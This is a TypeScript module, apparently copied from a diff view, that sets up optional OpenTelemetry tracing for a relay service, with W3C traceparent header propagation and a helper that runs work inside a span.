import { AsyncLocalStorageContextManager } from "@opentelemetry/context-async-hooks";
|
|
10
|
+
import { W3CTraceContextPropagator } from "@opentelemetry/core";
|
|
11
|
+
|
|
12
|
+
// OTLP tracing for the relay (ADR 0073 step 3b / ticket 0024). MANUAL spans + W3C
|
|
13
|
+
// `traceparent` propagation, not auto-instrumentation (require-in-the-middle is unreliable
|
|
14
|
+
// under Bun; the propagator + AsyncLocalStorage context API work, verified). **Gated**: a no-op
|
|
15
|
+
// unless OTEL_EXPORTER_OTLP_ENDPOINT is set, so the services run identically with tracing off:
// every helper below degrades to a safe no-op (the API's default no-op tracer/propagator).
|
|
16
|
+
//
|
|
17
|
+
// Duplicated in packages/present-relay/src/tracing.ts (present-relay is OSS-published; a shared
|
|
18
|
+
// package would force the five-place OSS lock-step).
|
|
19
|
+
|
|
20
|
+
let started = false;
|
|
21
|
+
|
|
22
|
+
/** Set up the global tracer provider, context manager and W3C propagator, once.
 * Call at process start. Does nothing when already initialised or when
 * OTEL_EXPORTER_OTLP_ENDPOINT is unset.
 *
 * @param serviceName value reported as the `service.name` resource attribute
 */
export function initTracing(serviceName: string): void {
  const endpoint = process.env.OTEL_EXPORTER_OTLP_ENDPOINT;
  if (started || !endpoint) return;
  started = true;

  const resource = resourceFromAttributes({
    [ATTR_SERVICE_NAME]: serviceName,
    [ATTR_SERVICE_VERSION]: process.env.PRESENT_RELAY_VERSION ?? "unknown",
  });
  // Spans are batched and exported to `<endpoint>/v1/traces` (one trailing slash stripped).
  const exporter = new OTLPTraceExporter({ url: `${endpoint.replace(/\/$/, "")}/v1/traces` });
  const provider = new BasicTracerProvider({
    resource,
    spanProcessors: [new BatchSpanProcessor(exporter)],
  });

  trace.setGlobalTracerProvider(provider);
  context.setGlobalContextManager(new AsyncLocalStorageContextManager().enable());
  propagation.setGlobalPropagator(new W3CTraceContextPropagator());
}
|
|
39
|
+
|
|
40
|
+
/** Fetch the "liebstoeckel" tracer from the OTel API. Looked up on every call rather
 * than cached at module load. */
const tracer = () => {
  return trace.getTracer("liebstoeckel");
};
|
|
41
|
+
|
|
42
|
+
/** Build the parent trace context for an incoming request: the headers are copied into
 * a plain carrier object and handed to the global propagator (W3C traceparent), with the
 * currently active context as the base. */
export function ctxFromHeaders(headers: Headers): Context {
  const carrier: Record<string, string> = {};
  for (const [name, value] of headers.entries()) {
    carrier[name] = value;
  }
  return propagation.extract(context.active(), carrier);
}
|
|
50
|
+
|
|
51
|
+
/** Write the active trace context into `h` for downstream propagation and return the same
 * object. `h` is mutated in place; a fresh object is used when none is passed. */
export function injectHeaders(h: Record<string, string> = {}): Record<string, string> {
  const active = context.active();
  propagation.inject(active, h);
  return h;
}
|
|
56
|
+
|
|
57
|
+
/** The trace id of the active span context (for stamping into structured logs).
 * Returns undefined when there is no span context or the id is the all-zero id. */
export function activeTraceId(): string | undefined {
  const spanContext = trace.getSpanContext(context.active());
  if (!spanContext) return undefined;
  if (spanContext.traceId === "00000000000000000000000000000000") return undefined;
  return spanContext.traceId;
}
|
|
62
|
+
|
|
63
|
+
/** Run `fn` inside a new span and return its result. The span is a child of `parent`
 * when given, else of the active context, and is made the active span while `fn` runs.
 * If `fn` throws or rejects, the exception is recorded on the span, the span status is
 * set to ERROR, and the error is re-thrown. The span is always ended. With tracing off
 * the span is non-recording and `fn` still runs.
 *
 * @param name   span name
 * @param parent parent context, or undefined to use the active one
 * @param attrs  attributes set on the span at start
 * @param fn     the work to run; receives the span
 * @param kind   span kind. Default INTERNAL; set SERVER on ingress handlers and CLIENT on
 *               outbound calls so the service graph + Traces-Drilldown "structure" view
 *               can build the trace hierarchy (those views key off SERVER spans with
 *               CLIENT edges; INTERNAL-only traces show no structure).
 */
export async function withSpan<T>(
  name: string,
  parent: Context | undefined,
  attrs: Record<string, string | number | boolean>,
  fn: (span: Span) => Promise<T> | T,
  kind: SpanKind = SpanKind.INTERNAL,
): Promise<T> {
  const base = parent ?? context.active();
  const span = tracer().startSpan(name, { kind, attributes: attrs }, base);
  try {
    const scoped = trace.setSpan(base, span);
    const result = await context.with(scoped, () => fn(span));
    return result;
  } catch (e) {
    span.recordException(e as Error);
    span.setStatus({ code: SpanStatusCode.ERROR, message: String(e) });
    throw e;
  } finally {
    span.end();
  }
}
|